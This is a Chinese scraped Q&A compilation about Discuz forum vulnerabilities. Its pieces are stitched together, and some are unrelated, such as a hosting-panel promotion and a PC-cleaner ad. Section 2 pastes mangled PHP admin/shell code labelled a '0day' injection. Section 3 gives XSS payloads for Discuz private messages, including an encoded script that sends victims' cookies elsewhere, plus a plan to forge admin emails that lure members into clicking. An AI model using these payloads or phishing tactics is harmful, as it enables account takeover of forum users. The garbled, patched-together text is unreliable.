本篇文章给大家谈谈discuz程序漏洞,以及discuz插件破解原理对应的知识点,希望对各位有所帮助,不要忘了收藏本站喔。
本文目录一览:
- 1、discuz漏洞!
- 2、discuz!6.0.0漏洞
- 3、目前动网论坛的漏洞有那些?如何利用这些漏洞入侵动网?
- 4、怎么利用discuz漏洞爆物理路径
- 5、discuz后台文件包含漏洞 怎么修复
1、discuz漏洞!
那是在尾页代码里修改.还有你把网站地址写到后台里那个就可以了.这个不是漏洞.
2、discuz!6.0.0漏洞
____Discuz6.0__________injection __0day
// 允许程序在 register_globals = off 的环境下工作
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
$self = $_SERVER['PHP_SELF'];
$dis_func = get_cfg_var("disable_functions");
/*===================== 身份验证 =====================*/
if($admin['check'] == "1") {
if ($_GET['action'] == "logout") {
setcookie ("adminpass", "");
echo "meta http-equiv=\"refresh\" content=\"3;URL=".$self."\"";
echo "span style=\"font-size: 12px; font-family: Verdana\"注销成功......pa href=\"".$self."\"三秒后自动退出或单击这里退出程序界面 /a/span";
exit;
}
if ($_POST['do'] == 'login') {
$thepass=trim($_POST['adminpass']);
if ($admin['pass'] == $thepass) {
setcookie ("adminpass",$thepass,time()+(1*24*3600));
echo "meta http-equiv=\"refresh\" content=\"3;URL=".$self."\"";
echo "span style=\"font-size: 12px; font-family: Verdana\"登陆成功......pa href=\"".$self."\"三秒后自动跳转或单击这里进入程序界面 /a/span";
exit;
}
}
if (isset($_COOKIE['adminpass'])) {
if ($_COOKIE['adminpass'] != $admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
/*===================== 验证结束 =====================*/
// 判断 magic_quotes_gpc 状态
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
---------------------------------------------------------------------------------------------------------------------
可以跳到其它目录
注册登录后利用
可以进行injection……
只能手工注射
注意:showpath里必须包含用户自己的路径
如果限制的话,还可以向上跳,向上级传文件的时候,不能直接
. (注射语句)
就包含用户路径
... rNumber=1402257EE8F
不然不能进行注射。
文件漏洞代码如下
?
define('__SYSTEM_ROOT', '');
include dirname(__FILE__).'/framework_gb/framework.php';
using('System.Data.Data');
using('System.Data.Plugins.Option');
using('System.Page.Page');
using('System.Smarty.Smarty');
using('System.Functions.Functions');
require_once __SYSTEM_ROOT."global.php";
require_once __SYSTEM_ROOT."vars.php";
$db=new stdClass();
$db=$Data-getDB();
/*
echo 'pre';
print_r($Data);
*/
?
可以直接注射,拿到后台密码。
好象是跨脚本漏洞
3、目前动网论坛的漏洞有那些?如何利用这些漏洞入侵动网?
在discuz!的发贴、回贴、PM等中的subject都没有经过过滤,所以也可以添加代码。 例如 ;fid=2...cript%3E%3Cb%22 效果是首先弹出自己的cookie 利用方法:把上述代码放置到img中。 适用版本:discuz!2.x discuz!3.x 一种利用discuz!2.0漏洞进行欺骗获得cookie的尝试 通过测试XXXFan论坛的PM功能存在一个安全漏洞,具体描述如下: XXXFan的给某个会员发送悄悄的链接如下(假定这个会员名字为XXXFan) ;username=XXXFan 因为论坛程序对会员名字没有进行过滤,而是直接显示在发送到栏目中(TO:),所以可以在名字后面加上script代码。例如 ;username=XXXFan "scriptalert(documents.cookie)/scriptb%20" 上面的链接点击以后首先弹出的是自己的cookie内容。 当然我们可以先在自己的站点上构造一个程序来收集cookie,类似于 getcookie.php?cookie= 但是如何来诱使会员点击呢,如果简单的放在论坛上,太容易被识别。所以可以利用discuz论坛程序的另外一个功能,"帖子介绍给朋友"功能。 因为discuz的这个功能对填写的emial地址没有进行任何过滤、辨别和模版,可以伪造任何人给别人发信,安全性很高。利用这个功能我们就可以伪造ExploitFan的管理员给某个会员发一封信,诱使会员点击我们准备的URL,如果诱使就看自己的手段了,例如可以说"论坛正在测试新功能,请您协助点击上面地址,我们会在后台记录您的点击在合适的时间会给您增加积分以做奖励"等等。 因为链接地址是XXXFan的,而且发信人和邮件地址都是XXXFan的官方地址,所以可信度非常高,而且不会留下任何把柄。当然为了更高的安全性,可以在script里的内容加密,以进一步增加隐蔽性。 至于得到cookie如何做,可以尝试cookie欺骗或者是暴力破解MD5密码 本方法适用于大部分使用discuz2.0的论坛,至于discuz3.0的利用方法请参与在我以前发表的discuz!悄悄话漏洞 【BUG】Discuz!投票的BUG 投票可以用 misc.php?action=votepollfid=2tid=16980pollanswers[]=n (n为选项,从0开始) 的方式通过URL来直接投票 但是如果n最大选项呢,嘻嘻~ 照样提交成功,不过增加了一个标题为空的选项 效果见: ;sid=dymPEc (那个最后的空白的是我刚加的) 该漏洞存在的版本: Discuz!3.X Discuz!2.X(可能,没有测试过) Discuz!的代码漏洞 这是接着昨天发现的漏洞所展开的,第一发现者(PK0909)。 具体的描述就不说了,下面是一个简单的测试代码。 /Article/UploadFiles/200412/20041225232318260.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2.XMLHTTP%22);Req.open(%22post%22,%22 );var%20forms=%22pmSubmit=Submit%22.toLowerCase()%2B%22%26msgto=XXXXX%26subject=cookie%26saveoutbox=0%26message=%22%2Bescape(documents.cookie);Req.setRequestHeader(%22Content-length%22,forms.length)%3BReq.setRequestHeader(%22CONTENT-TYPE%22,%22application/x-www-form-urlencoded%22);Req.send(forms);%3c/script%3e%3cb%22 [ /img] 发现discuz!UT 跨域站点的脚本漏洞--短消息篇有关跨域站点的脚本漏洞,已经算是非常平成并普遍的漏洞了。 有关具体的消息可以参阅: 下面针对Discuz、UT论坛程序的悄悄话部分加以说明 漏洞适应版本: Discuz1.X Discuz!2.0(0609,0820版) Discuz!3.X UT 1.0 漏洞描述: discuz!给指定会员发送悄悄话使用的是类似 ;username=name 的语句,但是name没有经过过滤直接显示在发送短消息的页面中,这就给偷cookie或者更严重的破坏打开了方便之门。 Discuz!3.X已经改为 ;uid=XXXX 类似的语句,避免了这个漏洞,但是在选择短信文件夹的时候却没有经过过滤。同样产生了上面的漏洞 例 ;username=name %22%3E%3Cscript%3Ealert(documents.cookie)%3C/script%3E%3Cb%22[/URL] ,上面的例子是显示自己的cookie。(针对Discuz!1.X Discuz!2.X) 显示自己的cookie。(针对Discuz!3.X) UT虽然在主题上经过了过滤,也就是说把%27转换为';但是其收件人却没有过滤,所以同样有类似的漏洞。例子略。(在不同的UT论坛上发现其代码不尽相同,但是总的来说都有类似的漏洞)
希望采纳
4、怎么利用discuz漏洞爆物理路径
如何保护discuz X后台地址路径,这是所有站长都非常关系的问题。有安全防范措施的站长都会想尽办法去解决这个问题。对于discuz
X后台地址路径处理方式,我们大概有如下几种做法:
修改默认的discuz X后台地址路径
使用地方插件处理discuz X后台地址路径
想办法将后台路径给隐藏
上述几个方法操作起来很有难度,任何企图修改discuz X后台地址路径都会有巨大的工作量,要对X2的程序非常了解才能办到,修改discuz
X后台地址路径,需要修改许多与之关联的路径,不精通discuz X和php编程,要实现很有难度。
就是将discuz X后台地址路径进行锁定,再加一道安全密码,双重保护加固discuz X后台地址路径。具体操作方法如下:
利用无忧主机php虚拟主机的“文件夹锁定”功能,一分钟就可以将后台路径加密访问,而且还不影响站点正常运行。
无忧php空间如何将文件夹进行保护家加密类?请阅读下面下面两个文章:
DirectAdmin(DA)控制面板文件夹保护加密功能介绍
DirectAdmin(DA)控制面板如何设置文件夹锁定保护加密访问
通过加密dx2后台地址路径的加密后,我们登录管理员后台首先输入一次,加密密码,然后再输入X2的后台管理帐号密码。多了一重保护,增加了一分安全。而且实现简单,容易操作,不需要有技术背景就可以完成。次方法仅适合使用无忧主机建站的站长。这是针对网站量身订制的加强型保护功能,希望一个小小的功能,为你提高大大的网站安全系数。
5、discuz后台文件包含漏洞 怎么修复
打开腾讯电脑管家——工具箱——修复漏洞,进行漏洞扫描和修复。
建议设置开启自动修复漏洞功能,开启后,电脑管家可以在发现高危漏洞(仅包括高危漏洞,不包括其它漏洞)时,第一时间自动进行修复,无需用户参与,最大程度保证用户电脑安全。尤其适合老人、小孩或计算机初级水平用户使用。开启方式如下:进入电脑管家“修复漏洞”模块—“设置”,点击开启自动修复漏洞即可。
关于discuz程序漏洞和discuz插件破解原理的介绍到此就结束了,不知道你从中找到你需要的信息了吗 ?如果你还想了解更多这方面的信息,记得收藏关注本站。